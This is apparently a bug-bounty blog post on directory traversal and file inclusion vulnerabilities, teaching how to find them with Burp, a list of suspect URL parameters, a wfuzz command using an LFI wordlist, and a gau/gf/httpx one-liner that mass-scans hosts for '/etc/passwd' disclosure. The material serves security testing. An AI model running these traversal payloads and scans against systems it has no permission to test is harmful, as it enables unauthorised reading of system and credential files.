Sign in Subscribe
Application Security

Unmasking Directory Traversal: Navigating Vulnerabilities in Web Applications (Techniques +…

In web applications, inadequate input validation can lead to Directory Traversal vulnerabilities. If file operations are conducted using…

fuffsec

3 min read

Unmasking Directory Traversal: Navigating Vulnerabilities in Web Applications (Techniques + Reports)

In web applications, inadequate input validation can lead to Directory Traversal vulnerabilities. If file operations are conducted using unchecked user-provided data, adversaries can potentially modify file paths, enabling them to access unauthorized directories. Such breaches can result in the unauthorized extraction of confidential data from the system.

what is the difference between directory listing, directory traversal, and file inclusion vulnerability?

  1. Directory Listing:
Description: Directory listing refers to the ability of a user to view a list of files and directories on a web server, typically because the server is misconfigured and doesn’t prevent this default behavior.
Impact: If directory listing is enabled, an attacker can view files that might not be intended for public access. This can lead to information disclosure, such as viewing configuration files, backup files, or other sensitive data.
Example: Visiting http://example.com/images/ and seeing a list of all image files because there's no index page and directory listing is enabled.

2. Directory Traversal (also known as Path Traversal):

Description: Directory traversal vulnerabilities occur when an application uses unsanitized user input to access files and directories. Attackers can exploit this to access files outside of the intended directory.
Impact: Attackers can read sensitive files on the server, potentially leading to information disclosure, or in some cases, even execute commands.
Example: Modifying a URL parameter like http://example.com/loadFile?filename=profile.jpg to http://example.com/loadFile?filename=../../etc/passwd to access the system's password file.

3. File Inclusion Vulnerability:

Description: File inclusion vulnerabilities arise when an application includes a file without properly sanitizing the input. There are two types: Local File Inclusion (LFI) and Remote File Inclusion (RFI). LFI involves including files that are locally available on the server, while RFI involves including remote files from external servers.
Impact: This can lead to various attacks, such as code execution, information disclosure, or even server takeover, especially if the included file contains executable code.
Example: An application that has a page http://example.com/index.php?page=about.php might be vulnerable if an attacker can change about.php to a malicious file path or URL, leading the server to include and execute it.

How to find a vulnerable directory traversal endpoint

  1. Turn on Burp and visit the target website
  2. Go through the website and catch all the exchange in burp
  3. find interesting endpoints such as [1]
    ?cat=
    ?dir=
    ?action=
    ?board=
    ?date=
    ?detail=
    ?file=
    ?download=
    ?path=
    ?folder=
    ?prefix=
    ?include=
    ?page=
    ?inc=
    ?locate=
    ?show=
    ?doc=
    ?site=
    ?type=
    ?view=
    ?content=
    ?document=
    ?layout=
    ?mod=
    ?conf=
  4. Fuzz it using Burp Intruder or wfuff
    wfuzz -c -z file,/usr/share/seclists/Fuzzing/LFI/LFI-Jhaddix.txt http://<URL>?file=../../../../../../../../../../FUZZ
  5. Anything that stands out in the response is your payload and modify it to make an impact and get the sensitive data out of the system.

One Liner :

cat hosts | gau | gf lfi | httpx -paths wordlist.txt -threads 100 -random-agent -x GET,POST -tech-detect -status-code -follow-redirects -mc 200 -mr “root:[x*]:0:0:”

Cheat Sheet to use:

  1. https://book.hacktricks.xyz/pentesting-web/file-inclusion
  2. https://hacktricks.boitatech.com.br/pentesting-web/file-inclusion

Bug Bounty Reports

  1. https://hackerone.com/reports/733072 ($12000)
  2. https://hackerone.com/reports/205481
  3. https://hackerone.com/reports/1007799
  4. https://hacklido.com/blog/356-lfi-an-interesting-tweak

More: https://github.com/reddelexc/hackerone-reports/blob/master/tops_by_bug_type/TOPFILEREADING.md

References:

  1. https://humbertojunior.com.br/infosec/pentest/2021/02/16/lfi-parameters.html
  2. https://github.com/0xPugazh/One-Liners

I have such a small request for all of you, I always write articles on many security topics. So if you didn’t follow, then follow me first and clap on this article, because that gives me the motivation to write something new !!

If you do not follow me on my social, here is my Twitter and LinkedIn.

☛ My-Twitter
My-Linkedin